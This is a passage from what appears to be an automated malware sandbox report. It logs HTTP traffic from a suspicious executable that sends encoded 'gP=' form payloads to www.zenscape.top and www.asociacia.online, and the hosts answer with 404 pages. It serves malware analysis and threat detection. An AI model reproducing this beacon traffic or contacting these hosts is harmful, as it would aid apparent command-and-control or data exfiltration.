                                                                                                      Data Raw: 67 50 3d 2f 69 74 57 33 34 73 62 30 31 4c 6c 48 38 6c 67 47 31 42 6a 63 43 4a 2f 30 33 79 52 48 7a 37 49 37 47 45 6a 6b 4f 2f 32 2b 4b 4e 39 47 7a 68 71 31 41 64 6f 30 39 56 42 71 56 62 38 54 73 65 67 61 63 57 54 54 72 52 73 74 78 4f 6e 4d 6b 58 43 33 69 59 72 70 6c 71 4a 79 71 71 69 75 65 78 2b 6c 44 30 57 41 54 48 31 52 33 62 70 58 4a 39 57 58 50 64 6a 65 67 44 66 6e 4d 33 50 36 49 6e 48 41 45 43 6f 62 7a 68 70 55 73 48 6e 75 67 58 6b 54 50 49 36 7a 44 7a 52 50 2b 6a 64 68 46 2f 38 30 49 38 4e 33 63 51 6f 46 55 30 54 77 6f 61 33 7a 42 57 4d 68 41 31 66 59 33 78 42 6e 7a 2f 48 6e 77 3d 3d
                                                                                                      Data Ascii: gP=/itW34sb01LlH8lgG1BjcCJ/03yRHz7I7GEjkO/2+KN9Gzhq1Ado09VBqVb8TsegacWTTrRstxOnMkXC3iYrplqJyqqiuex+lD0WATH1R3bpXJ9WXPdjegDfnM3P6InHAECobzhpUsHnugXkTPI6zDzRP+jdhF/80I8N3cQoFU0Twoa3zBWMhA1fY3xBnz/Hnw==
                                                                                                      Oct 8, 2024 15:55:39.614902020 CEST980INHTTP/1.1 404 Not Found
                                                                                                      Date: Tue, 08 Oct 2024 13:55:39 GMT
                                                                                                      Server: Apache
                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                      Content-Length: 774
                                                                                                      X-XSS-Protection: 1; mode=block
                                                                                                      Connection: close
                                                                                                      Content-Type: text/html
                                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0d 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 0d 0a 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 52 6f 62 6f 74 6f 3a 34 30 30 2c 37 30 30 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 74 65 78 [TRUNCATED]
                                                                                                      Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>404 Not Found</title><link href="https://fonts.googleapis.com/css?family=Roboto:400,700" rel="stylesheet"><link type="text/css" rel="stylesheet" href="/css/style404.css" /></head><body><div id="notfound"><div class="notfound"><div class="notfound-404"><h1>4<span>0</span>4</h1></div><h2>the page you requested could not found</h2><form class="notfound-search"><input type="text" placeholder="Search..."><button type="button"><span></span></button></form></div></div></body></html>


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      10192.168.2.1149991199.192.21.169803000C:\Program Files (x86)\PZHeSQlLTMgDWGgAeGkqhKIlzUAaLXeGcDNeBEjXxOvHEQaaccEFsXfl\UCAmCgWJyh.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Oct 8, 2024 15:55:42.236865997 CEST744OUTPOST /d8cw/ HTTP/1.1
                                                                                                      Host: www.zenscape.top
                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                      Accept-Language: en-US
                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                      Cache-Control: no-cache
                                                                                                      Connection: close
                                                                                                      Content-Length: 219
                                                                                                      Origin: http://www.zenscape.top
                                                                                                      Referer: http://www.zenscape.top/d8cw/
                                                                                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.152 Safari/537.36
                                                                                                      Data Raw: 67 50 3d 2f 69 74 57 33 34 73 62 30 31 4c 6c 48 66 74 67 41 6d 35 6a 4c 79 4a 38 33 33 79 52 4e 54 37 45 37 47 49 6a 6b 4c 66 6d 72 6f 70 39 47 58 6c 71 6e 52 64 6f 33 39 56 42 6c 31 62 35 58 73 65 76 61 63 71 62 54 75 70 73 74 78 61 6e 4d 68 72 43 33 78 67 6f 6f 31 71 50 37 4b 71 67 78 75 78 2b 6c 44 30 57 41 54 53 51 52 33 7a 70 55 35 4e 57 57 75 64 73 43 77 44 63 33 73 33 50 78 6f 6e 44 41 45 43 65 62 32 46 44 55 75 76 6e 75 6c 7a 6b 64 2b 49 35 35 44 7a 66 46 65 69 6a 6b 48 66 79 30 6f 78 64 77 75 78 61 53 41 41 76 38 4f 4c 74 6a 69 66 62 69 54 39 64 4d 52 51 78 75 43 61 4f 38 34 63 57 74 75 47 33 54 31 6b 53 71 4a 4c 4b 65 73 57 37 46 39 34 3d
                                                                                                      Data Ascii: gP=/itW34sb01LlHftgAm5jLyJ833yRNT7E7GIjkLfmrop9GXlqnRdo39VBl1b5XsevacqbTupstxanMhrC3xgoo1qP7Kqgxux+lD0WATSQR3zpU5NWWudsCwDc3s3PxonDAECeb2FDUuvnulzkd+I55DzfFeijkHfy0oxdwuxaSAAv8OLtjifbiT9dMRQxuCaO84cWtuG3T1kSqJLKesW7F94=
                                                                                                      Oct 8, 2024 15:55:42.829372883 CEST980INHTTP/1.1 404 Not Found
                                                                                                      Date: Tue, 08 Oct 2024 13:55:42 GMT
                                                                                                      Server: Apache
                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                      Content-Length: 774
                                                                                                      X-XSS-Protection: 1; mode=block
                                                                                                      Connection: close
                                                                                                      Content-Type: text/html
                                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0d 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 0d 0a 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 52 6f 62 6f 74 6f 3a 34 30 30 2c 37 30 30 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 74 65 78 [TRUNCATED]
                                                                                                      Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>404 Not Found</title><link href="https://fonts.googleapis.com/css?family=Roboto:400,700" rel="stylesheet"><link type="text/css" rel="stylesheet" href="/css/style404.css" /></head><body><div id="notfound"><div class="notfound"><div class="notfound-404"><h1>4<span>0</span>4</h1></div><h2>the page you requested could not found</h2><form class="notfound-search"><input type="text" placeholder="Search..."><button type="button"><span></span></button></form></div></div></body></html>


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      11192.168.2.1149992199.192.21.169803000C:\Program Files (x86)\PZHeSQlLTMgDWGgAeGkqhKIlzUAaLXeGcDNeBEjXxOvHEQaaccEFsXfl\UCAmCgWJyh.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Oct 8, 2024 15:55:44.786650896 CEST1757OUTPOST /d8cw/ HTTP/1.1
                                                                                                      Host: www.zenscape.top
                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                      Accept-Language: en-US
                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                      Cache-Control: no-cache
                                                                                                      Connection: close
                                                                                                      Content-Length: 1231
                                                                                                      Origin: http://www.zenscape.top
                                                                                                      Referer: http://www.zenscape.top/d8cw/
                                                                                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.152 Safari/537.36
                                                                                                      Data Raw: 67 50 3d 2f 69 74 57 33 34 73 62 30 31 4c 6c 48 66 74 67 41 6d 35 6a 4c 79 4a 38 33 33 79 52 4e 54 37 45 37 47 49 6a 6b 4c 66 6d 72 6f 68 39 46 6b 39 71 31 69 46 6f 34 64 56 42 73 56 62 34 58 73 65 32 61 63 79 6c 54 76 55 5a 74 33 57 6e 44 6a 54 43 67 51 67 6f 69 31 71 50 32 71 71 74 75 65 78 52 6c 44 6b 53 41 54 43 51 52 33 7a 70 55 37 56 57 41 50 64 73 41 77 44 66 6e 4d 32 4f 36 49 6e 6e 41 45 36 4f 62 33 45 30 58 66 50 6e 75 46 6a 6b 66 4d 67 35 78 44 7a 64 43 65 69 72 6b 48 53 77 30 6f 74 52 77 75 6f 50 53 48 30 76 32 4b 61 53 37 41 72 54 31 69 35 51 53 51 63 6c 70 42 71 32 32 4a 4d 51 71 38 4b 42 4e 46 30 43 75 71 6d 59 43 65 36 42 5a 64 39 51 49 67 67 37 54 4d 73 61 62 39 47 34 6e 62 58 66 5a 55 62 64 36 49 53 54 46 43 55 5a 4b 42 76 37 37 55 79 46 70 43 32 33 53 45 74 45 75 76 58 6b 62 49 74 70 6b 52 4e 74 67 71 33 35 47 6a 52 48 39 4c 70 50 6e 51 59 6a 70 74 54 74 42 59 30 68 46 70 75 59 6f 75 55 39 53 7a 73 39 67 4e 33 50 76 75 63 48 56 57 2b 6b 56 72 61 63 49 76 79 51 73 34 77 45 49 52 34 [TRUNCATED]
                                                                                                      Data Ascii: gP=/itW34sb01LlHftgAm5jLyJ833yRNT7E7GIjkLfmroh9Fk9q1iFo4dVBsVb4Xse2acylTvUZt3WnDjTCgQgoi1qP2qqtuexRlDkSATCQR3zpU7VWAPdsAwDfnM2O6InnAE6Ob3E0XfPnuFjkfMg5xDzdCeirkHSw0otRwuoPSH0v2KaS7ArT1i5QSQclpBq22JMQq8KBNF0CuqmYCe6BZd9QIgg7TMsab9G4nbXfZUbd6ISTFCUZKBv77UyFpC23SEtEuvXkbItpkRNtgq35GjRH9LpPnQYjptTtBY0hFpuYouU9Szs9gN3PvucHVW+kVracIvyQs4wEIR4QvxlBJDbfb4n44+/T0IaJrHvz3Iph64bY7jAI6z0efFe4mDIeSpsKk45KRBgkHuIRB0n7lb7NA8nQ34N70TkMBwToiKJoJRUzkZ3+WZ8rUqxLV8BRv8yDMTigjcPNagRvoTyIDQN4upkwOjO4YpMhkvllVXMY8mePKnXzc7ie+xfbuy6DMNB/NS6x5x/gaPuJE+5UDMxhe97tUTDglG0/LFstRKdh/smCGs49/ddV+HrW8b93Uc/dxN/YHaNTF9J046Z/frBK9R8I5pbAM6FTkhb6XSc783Gs4m6Nw+Xmv5UK9ZTilHNPCRpwRIMgD/8O4OwxqDv5lRNyEg5Ig+mID1oLD/jTl4AliNLwBqWCfj7+LTdLUY+yj9SbT34VNZLIvrOlkQDaAcdDVoiEBs0mNJszJNa3HnuUvJyb5ddBXHzLEnhtkn+GAxi+XrkD8M4hBEqVBShlrCdBA5UMMSxS5iflsVz1x2j7tN7lqP1LNrtrUqqURXXEy1rpE2YWlBwRnE7o0yxddWUwgrhMPVSnQeBiFiYnzykiE0sxbyIuOOmVhTyQvaXZex3TUnlLGOBV2hd98k8Gs+5/EBoGqekQj1ZHa659rz7PT/vqhFiCRCAIYHIAe+yze33Ahc8RzbP/08hMA/kd+VUSRwggnYgQNGnRAs/YUwu7V [TRUNCATED]
                                                                                                      Oct 8, 2024 15:55:45.444499969 CEST980INHTTP/1.1 404 Not Found
                                                                                                      Date: Tue, 08 Oct 2024 13:55:45 GMT
                                                                                                      Server: Apache
                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                      Content-Length: 774
                                                                                                      X-XSS-Protection: 1; mode=block
                                                                                                      Connection: close
                                                                                                      Content-Type: text/html
                                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0d 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 0d 0a 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 52 6f 62 6f 74 6f 3a 34 30 30 2c 37 30 30 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 74 65 78 [TRUNCATED]
                                                                                                      Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>404 Not Found</title><link href="https://fonts.googleapis.com/css?family=Roboto:400,700" rel="stylesheet"><link type="text/css" rel="stylesheet" href="/css/style404.css" /></head><body><div id="notfound"><div class="notfound"><div class="notfound-404"><h1>4<span>0</span>4</h1></div><h2>the page you requested could not found</h2><form class="notfound-search"><input type="text" placeholder="Search..."><button type="button"><span></span></button></form></div></div></body></html>


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      12192.168.2.1149993199.192.21.169803000C:\Program Files (x86)\PZHeSQlLTMgDWGgAeGkqhKIlzUAaLXeGcDNeBEjXxOvHEQaaccEFsXfl\UCAmCgWJyh.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Oct 8, 2024 15:55:47.331054926 CEST460OUTGET /d8cw/?gP=ygF20N1+ik7kBOtBXXgSSDl+0mvoPS6R8XEst5j0lvkfFXMCnxh1w4hdkVa8euGiR7K2W9wNoXO2NDH8py5otm2v66eMoudDkD1QDiauZF6PALhNXvt3BHI=&-L=kBMxZFRpAD6P HTTP/1.1
                                                                                                      Host: www.zenscape.top
                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                      Accept-Language: en-US
                                                                                                      Connection: close
                                                                                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.152 Safari/537.36
                                                                                                      Oct 8, 2024 15:55:47.945543051 CEST995INHTTP/1.1 404 Not Found
                                                                                                      Date: Tue, 08 Oct 2024 13:55:47 GMT
                                                                                                      Server: Apache
                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                      Content-Length: 774
                                                                                                      X-XSS-Protection: 1; mode=block
                                                                                                      Connection: close
                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0d 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 0d 0a 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 52 6f 62 6f 74 6f 3a 34 30 30 2c 37 30 30 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 74 65 78 [TRUNCATED]
                                                                                                      Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>404 Not Found</title><link href="https://fonts.googleapis.com/css?family=Roboto:400,700" rel="stylesheet"><link type="text/css" rel="stylesheet" href="/css/style404.css" /></head><body><div id="notfound"><div class="notfound"><div class="notfound-404"><h1>4<span>0</span>4</h1></div><h2>the page you requested could not found</h2><form class="notfound-search"><input type="text" placeholder="Search..."><button type="button"><span></span></button></form></div></div></body></html>


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      13192.168.2.114999481.2.196.19803000C:\Program Files (x86)\PZHeSQlLTMgDWGgAeGkqhKIlzUAaLXeGcDNeBEjXxOvHEQaaccEFsXfl\UCAmCgWJyh.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Oct 8, 2024 15:55:53.053775072 CEST736OUTPOST /jsqu/ HTTP/1.1
                                                                                                      Host: www.asociacia.online
                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                      Accept-Language: en-US
                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                      Cache-Control: no-cache
                                                                                                      Connection: close
                                                                                                      Content-Length: 199
                                                                                                      Origin: http://www.asociacia.online
                                                                                                      Referer: http://www.asociacia.online/jsqu/
                                                                                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.152 Safari/537.36
                                                                                                      Data Raw: 67 50 3d 75 34 68 6d 5a 66 74 6c 58 43 78 34 67 6a 38 6d 38 35 68 4d 76 4d 6d 47 7a 30 7a 4e 57 77 56 46 6c 77 33 48 47 30 45 53 6e 47 69 72 44 56 63 61 4e 5a 77 47 4c 4f 71 74 56 6c 63 56 44 70 35 79 52 48 7a 2b 2b 63 2f 37 51 73 4e 64 56 73 35 6d 49 4c 66 6c 4c 58 53 59 5a 59 48 41 62 45 68 6e 72 56 59 66 4d 55 74 49 49 44 77 7a 63 4f 31 49 6e 4e 48 72 6c 66 4b 38 34 39 61 39 49 34 39 68 4b 39 2f 78 39 61 55 6e 30 49 46 66 48 4d 72 37 67 2f 30 56 42 30 6d 76 61 50 5a 76 75 4c 4f 53 42 36 4c 6a 35 36 63 33 61 53 72 36 79 52 44 75 52 42 52 38 6a 4e 75 6e 47 59 75 4e 49 66 7a 65 6c 41 3d 3d
                                                                                                      Data Ascii: gP=u4hmZftlXCx4gj8m85hMvMmGz0zNWwVFlw3HG0ESnGirDVcaNZwGLOqtVlcVDp5yRHz++c/7QsNdVs5mILflLXSYZYHAbEhnrVYfMUtIIDwzcO1InNHrlfK849a9I49hK9/x9aUn0IFfHMr7g/0VB0mvaPZvuLOSB6Lj56c3aSr6yRDuRBR8jNunGYuNIfzelA==
                                                                                                      Oct 8, 2024 15:55:53.696913004 CEST355INHTTP/1.1 404 Not Found
                                                                                                      Server: nginx
                                                                                                      Date: Tue, 08 Oct 2024 13:55:53 GMT
                                                                                                      Content-Type: text/html
                                                                                                      Transfer-Encoding: chunked
                                                                                                      Connection: close
                                                                                                      Content-Encoding: gzip
                                                                                                      Data Raw: 61 61 0d 0a 1f 8b 08 00 00 00 00 00 04 03 ed 90 b1 0a 02 31 10 44 7b c1 7f 58 3f 20 44 e1 ca 25 8d 28 58 68 e3 17 e4 dc f5 12 c8 6d 8e 18 c1 fb 7b 13 bd 03 b1 b6 b4 dc 99 37 c3 b0 e8 72 1f cc 72 81 8e 2d 19 cc 3e 07 36 cd ba 81 53 cc b0 8f 77 21 d4 6f 11 f5 0b 29 68 1b 69 ac 91 0b 4b e6 64 d0 6d be 13 45 41 3d d9 b5 bb 40 d3 25 9d 97 c7 a7 a7 e7 36 3d 2f 59 29 05 16 06 4b e4 a5 83 1c 81 fc cd b6 81 e1 78 3e ec c0 0a c1 d6 a5 d8 33 5c 93 67 a1 30 02 a7 14 53 49 74 0c 4a d5 65 ff 8a 5f fe e2 09 27 a7 bf a8 24 02 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                                      Data Ascii: aa1D{X? D%(Xhm{7rr->6Sw!o)hiKdmEA=@%6=/Y)Kx>3\g0SItJe_'$0


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      14192.168.2.114999581.2.196.19803000C:\Program Files (x86)\PZHeSQlLTMgDWGgAeGkqhKIlzUAaLXeGcDNeBEjXxOvHEQaaccEFsXfl\UCAmCgWJyh.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Oct 8, 2024 15:55:55.602183104 CEST756OUTPOST /jsqu/ HTTP/1.1
                                                                                                      Host: www.asociacia.online
                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                      Accept-Language: en-US
                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                      Cache-Control: no-cache
                                                                                                      Connection: close
                                                                                                      Content-Length: 219
                                                                                                      Origin: http://www.asociacia.online
                                                                                                      Referer: http://www.asociacia.online/jsqu/
                                                                                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.152 Safari/537.36
                                                                                                      Data Raw: 67 50 3d 75 34 68 6d 5a 66 74 6c 58 43 78 34 68 43 73 6d 7a 2b 4e 4d 6b 4d 6d 46 32 30 7a 4e 59 51 55 4d 6c 77 37 48 47 31 42 50 79 67 36 72 41 30 73 61 63 6f 77 47 59 2b 71 74 4e 56 63 51 4d 4a 35 35 52 48 50 4d 2b 64 54 37 51 74 70 64 56 70 56 6d 49 34 33 6b 5a 33 53 65 55 34 48 43 55 6b 68 6e 72 56 59 66 4d 55 49 6e 49 48 55 7a 64 2b 46 49 6e 76 76 73 37 50 4b 39 39 39 61 39 5a 6f 39 74 4b 39 2f 48 39 61 6c 4d 30 4f 42 66 48 4a 76 37 67 71 59 57 59 45 6d 74 46 66 59 36 6c 2b 72 72 49 34 53 7a 34 6f 55 44 54 67 76 70 7a 58 53 30 42 69 59 72 67 65 6d 6c 53 2b 50 39 42 75 57 58 2b 4e 69 7a 39 6b 4f 71 55 35 72 77 71 58 45 36 77 75 61 48 74 33 77 3d
                                                                                                      Data Ascii: gP=u4hmZftlXCx4hCsmz+NMkMmF20zNYQUMlw7HG1BPyg6rA0sacowGY+qtNVcQMJ55RHPM+dT7QtpdVpVmI43kZ3SeU4HCUkhnrVYfMUInIHUzd+FInvvs7PK999a9Zo9tK9/H9alM0OBfHJv7gqYWYEmtFfY6l+rrI4Sz4oUDTgvpzXS0BiYrgemlS+P9BuWX+Niz9kOqU5rwqXE6wuaHt3w=
                                                                                                      Oct 8, 2024 15:55:56.264822960 CEST355INHTTP/1.1 404 Not Found
                                                                                                      Server: nginx
                                                                                                      Date: Tue, 08 Oct 2024 13:55:56 GMT
                                                                                                      Content-Type: text/html
                                                                                                      Transfer-Encoding: chunked
                                                                                                      Connection: close
                                                                                                      Content-Encoding: gzip
                                                                                                      Data Raw: 61 61 0d 0a 1f 8b 08 00 00 00 00 00 04 03 ed 90 b1 0a 02 31 10 44 7b c1 7f 58 3f 20 44 e1 ca 25 8d 28 58 68 e3 17 e4 dc f5 12 c8 6d 8e 18 c1 fb 7b 13 bd 03 b1 b6 b4 dc 99 37 c3 b0 e8 72 1f cc 72 81 8e 2d 19 cc 3e 07 36 cd ba 81 53 cc b0 8f 77 21 d4 6f 11 f5 0b 29 68 1b 69 ac 91 0b 4b e6 64 d0 6d be 13 45 41 3d d9 b5 bb 40 d3 25 9d 97 c7 a7 a7 e7 36 3d 2f 59 29 05 16 06 4b e4 a5 83 1c 81 fc cd b6 81 e1 78 3e ec c0 0a c1 d6 a5 d8 33 5c 93 67 a1 30 02 a7 14 53 49 74 0c 4a d5 65 ff 8a 5f fe e2 09 27 a7 bf a8 24 02 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                                      Data Ascii: aa1D{X? D%(Xhm{7rr->6Sw!o)hiKdmEA=@%6=/Y)Kx>3\g0SItJe_'$0


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      15192.168.2.114999681.2.196.19803000C:\Program Files (x86)\PZHeSQlLTMgDWGgAeGkqhKIlzUAaLXeGcDNeBEjXxOvHEQaaccEFsXfl\UCAmCgWJyh.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Oct 8, 2024 15:55:58.290016890 CEST1769OUTPOST /jsqu/ HTTP/1.1
                                                                                                      Host: www.asociacia.online
                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                      Accept-Language: en-US
                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                      Cache-Control: no-cache
                                                                                                      Connection: close
                                                                                                      Content-Length: 1231
                                                                                                      Origin: http://www.asociacia.online
                                                                                                      Referer: http://www.asociacia.online/jsqu/
                                                                                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.152 Safari/537.36
